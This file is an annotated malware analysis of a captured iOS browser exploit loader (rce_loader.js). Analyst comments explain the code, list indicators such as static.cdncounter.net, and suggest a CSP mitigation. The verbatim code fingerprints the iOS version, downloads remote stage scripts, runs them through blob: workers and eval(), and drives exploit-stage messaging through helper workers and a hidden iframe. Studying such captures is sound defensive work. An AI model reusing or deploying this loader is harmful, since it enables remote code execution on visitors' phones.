rce_loader.js
// Analyst annotations for a captured browser-side loader (rce_loader.js).
// The code tokens are kept exactly as captured; only comments were added and
// the viewer's line breaks were restored.
//
// What the visible code does, in order:
//   1. Parses an iOS version out of navigator.userAgent.
//   2. Synchronously downloads a version-specific worker script and runs it
//      as a Web Worker from a blob: URL.
//   3. Synchronously downloads a version-specific "module" script and runs
//      it with eval() inside main().
//   4. Relays messages between the main worker, two helper workers and a
//      hidden iframe.
//
// Indicators visible on this page (nothing below is inferred):
//   host:  static.cdncounter.net  (paths /assets and /404.html)
//   files: rce_worker_18.6.js, rce_worker_18.4.js,
//          rce_module_18.6.js, rce_module.js  (relative URLs, each with a
//          ?<Date.now()> cache-busting query string)
//
// Defensive note: where the hosting page's response headers are under the
// defender's control, a Content-Security-Policy whose script-src omits
// 'unsafe-eval' blocks step 3, and a worker-src that does not list blob:
// blocks the blob-URL workers of step 2.

// Logging switch; also forwarded to the worker in the stage messages below.
var SERVER_LOG = true;
let logStart = new Date().getTime();
let logEntryID = 0;
// offsets, slide, chipset and device_model are never assigned in the visible
// code; they are forwarded to the worker in the 'stage1' message.
// NOTE(review): presumably filled in by the eval()'d module - not shown here.
var offsets = {};
var slide;
var chipset;
var device_model;
// Forwarded to the worker as `desiredHost`.
var localHost = "https://static.cdncounter.net/assets"
// Builds a timestamped log record. The code that would send it to
// /log.html is commented out, so as captured this function has no
// observable effect beyond incrementing logEntryID.
function print(x, reportError = false, dumphex = false) {
    let out = ('[' + (new Date().getTime() - logStart) + 'ms] ').padEnd(10) + x;
    if (!SERVER_LOG && !reportError) return;
    let obj = {
        id: logEntryID++,
        text: out,
    }
    if (dumphex) {
        obj.hex = 1
        obj.text = x
    }
    //let req = Object.entries(obj).map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(v)}`).join('&')
    //const xhr = new XMLHttpRequest();
    //xhr.open("GET", "/log.html?" + req , false);
    //xhr.send(null);
}
// Navigates the tab to a fixed 404 page on the same host as localHost.
// Reached only through the 'redirect' message from the worker.
function redirect()
{
    window.location.href = "https://static.cdncounter.net/404.html";
}
// Fetches `fname` with a synchronous XMLHttpRequest (third argument of
// open() is false) and returns the response text.
// - `method` is accepted but unused; the request is always a GET.
// - `url` is assigned without a declaration, so in sloppy mode it becomes a
//   global property that is observable after the call.
// - Any exception is swallowed and the function then returns undefined.
function getJS(fname,method = 'GET')
{
    try
    {
        url = fname;
        //(`trying to fetch ${method} from: ${url}`);
        let xhr = new XMLHttpRequest();
        xhr.open("GET", `${url}` , false);
        xhr.send(null);
        return xhr.responseText;
    }
    catch(e)
    {
        // print("got error in getJS: " + e);
    }
}
// Not referenced again in the visible code.
const signal = new Uint8Array(8);
// Source text of a helper worker, held as a string and started from a
// blob: URL below. On 'init' it stores the supplied value in globalThis[0],
// creates an ImageBitmap from a 1x1 OffscreenCanvas, keeps it in
// globalThis[1] and posts null back. On 'dlopen' it calls close() on that
// bitmap.
// NOTE(review): the message name suggests close() is used for a side effect
// inside the worker; this page does not show what that effect is.
// Whitespace inside the literal was lost in the capture and is reconstructed.
const dlopen_worker = `(() => {
    self.onmessage = function (e) {
        const {
            type,
            data
        } = e.data;
        switch (type) {
            case 'init':
                const canvas = new OffscreenCanvas(1, 1);
                globalThis[0] = data;
                createImageBitmap(canvas).then(bitmap => {
                    globalThis[1] = bitmap;
                    self.postMessage(null);
                });
                break;
            case 'dlopen':
                globalThis[1].close();
                break;
        }
    };
})();`;
const dlopen_worker_blob = new Blob([dlopen_worker], { type: 'application/javascript'});
const dlopen_worker_url = URL.createObjectURL(dlopen_worker_blob);
// Version fingerprint taken from the User-Agent: "iPhone OS 18_6_1" yields
// [18, 6, 1]. When the pattern does not match, ios_version is undefined.
const ios_version = (function() {
    let version = /iPhone OS ([0-9_]+)/g.exec(navigator.userAgent)?.[1];
    if (version) {
        return version.split('_').map(part => parseInt(part));
    }
})();
// The == comparisons coerce the array to its comma-joined string, so the
// first branch matches exactly 18.6, 18.6.1 and 18.6.2. Every other value,
// including undefined for a non-matching User-Agent, takes the else branch.
let workerCode = "";
if(ios_version == '18,6' || ios_version == '18,6,1' || ios_version == '18,6,2')
    workerCode = getJS(`rce_worker_18.6.js?${Date.now()}`); // local version
else
    workerCode = getJS(`rce_worker_18.4.js?${Date.now()}`); // local version
// The downloaded text is wrapped in a Blob, so the worker runs from a blob:
// URL rather than from the URL it was fetched from.
let workerBlob = new Blob([workerCode],{type:'text/javascript'});
let workerBlobUrl = URL.createObjectURL(workerBlob);
(() => {
    function doRedirect() {
        redirect();
    }
    // Starts the main worker, sets up the message relay, eval()s the module
    // script and then sends the first stage message to the worker.
    function main() {
        // Allocated zero-filled and never written in the visible code;
        // forwarded in the 'stage1_rce' message.
        const randomValues = new Uint32Array(32);
        const begin = Date.now();
        const origin = location.origin;
        const worker = new Worker(workerBlobUrl);
        const dlopen_workers = [];
        // Starts the two helper workers one after another; each is sent
        // 'init' with 0x11111111 * i and awaited until it posts back.
        async function prepare_dlopen_workers() {
            for (let i = 1; i <= 2; ++i) {
                const worker = new Worker(dlopen_worker_url);
                dlopen_workers.push(worker);
                await new Promise(r => {
                    worker.postMessage({
                        type: 'init',
                        data: 0x11111111 * i
                    });
                    worker.onmessage = r;
                });
            }
        }
        // Zero-sized iframe with an empty srcdoc, attached to the document.
        const iframe = document.createElement('iframe');
        iframe.srcdoc = '';
        iframe.style.height = 0;
        iframe.style.width = 0;
        document.body.appendChild(iframe);
        // Main-thread half of the worker protocol. The worker script that
        // sends these message types is not on this page, so the comments
        // below describe only what this side does in response.
        async function message_handler(e) {
            const data = e.data;
            switch (data.type) {
                case 'redirect':
                {
                    doRedirect();
                    break;
                }
                case 'prepare_dlopen_workers':
                {
                    await prepare_dlopen_workers();
                    worker.postMessage({
                        type: 'dlopen_workers_prepared'
                    });
                    break;
                }
                // Tells helper worker 0 to close its bitmap, then asks the
                // main worker to check the outcome.
                case 'trigger_dlopen1':
                {
                    dlopen_workers[0].postMessage({
                        type: 'dlopen'
                    });
                    worker.postMessage({
                        type: 'check_dlopen1'
                    });
                    break;
                }
                // Same as above for helper worker 1.
                case 'trigger_dlopen2':
                {
                    dlopen_workers[1].postMessage({
                        type: 'dlopen'
                    });
                    worker.postMessage({
                        type: 'check_dlopen2'
                    });
                    break;
                }
                // Both cases below write '1' into the hidden iframe's
                // document and then acknowledge to the worker.
                case 'sign_pointers':
                {
                    iframe.contentDocument.write('1');
                    worker.postMessage({
                        type: 'setup_fcall'
                    });
                    break;
                }
                case 'slow_fcall':
                {
                    iframe.contentDocument.write('1');
                    worker.postMessage({
                        type: 'slow_fcall_done'
                    });
                    break;
                }
                default:
                {
                    break;
                }
            }
        }
        worker.onmessage = message_handler;
        try
        {
            let rceCode = "";
            if(ios_version == '18,6' || ios_version == '18,6,1' || ios_version == '18,6,2')
                rceCode = getJS(`rce_module_18.6.js?${Date.now()}`); // local version
            else
                rceCode = getJS(`rce_module.js?${Date.now()}`); // local version
            // NOTE(review): remotely fetched text is passed to a direct
            // eval(), so it runs with access to main()'s local variables as
            // well as the page's globals. Exceptions are swallowed, so a
            // failure here leaves no trace in the console.
            try
            {
                eval(rceCode);
            }
            catch(e)
            {
                //print("Got exception while running rce: " + e);
            }
            let desiredHost = "";
            desiredHost = localHost;
            if(ios_version == '18,6' || ios_version == '18,6,1' || ios_version == '18,6,2')
            {
                // 18.6.x path: the worker is started immediately.
                worker.postMessage({
                    type: 'stage1_rce',
                    desiredHost,
                    randomValues,
                    SERVER_LOG
                });
            }
            else
            {
                // check_attempt is not defined anywhere on this page.
                // NOTE(review): presumably supplied by the eval()'d module.
                // start() is tried at most twice; 'stage1' is sent to the
                // worker only after a truthy result.
                var attempt = new check_attempt();
                attempt.start().then((result) => {
                    if(!result)
                    {
                        // print("Retrying");
                        attempt.start().then((result) => {
                            if(!result)
                                print("");
                            else
                            {
                                worker.postMessage({
                                    type: 'stage1',
                                    begin,
                                    origin,
                                    ios_version,
                                    offsets,
                                    slide,
                                    chipset,
                                    device_model,
                                    desiredHost,
                                    SERVER_LOG
                                });
                            }
                        });
                    }
                    else
                    {
                        //WebViewComptability(attempt, iframe);
                        worker.postMessage({
                            type: 'stage1',
                            begin,
                            origin,
                            ios_version,
                            offsets,
                            slide,
                            chipset,
                            device_model,
                            desiredHost,
                            SERVER_LOG
                        });
                    }
                });
            }
        }
        catch(e)
        {
            // print("Got exception on something: " + e);
        }
    }
    main();
})();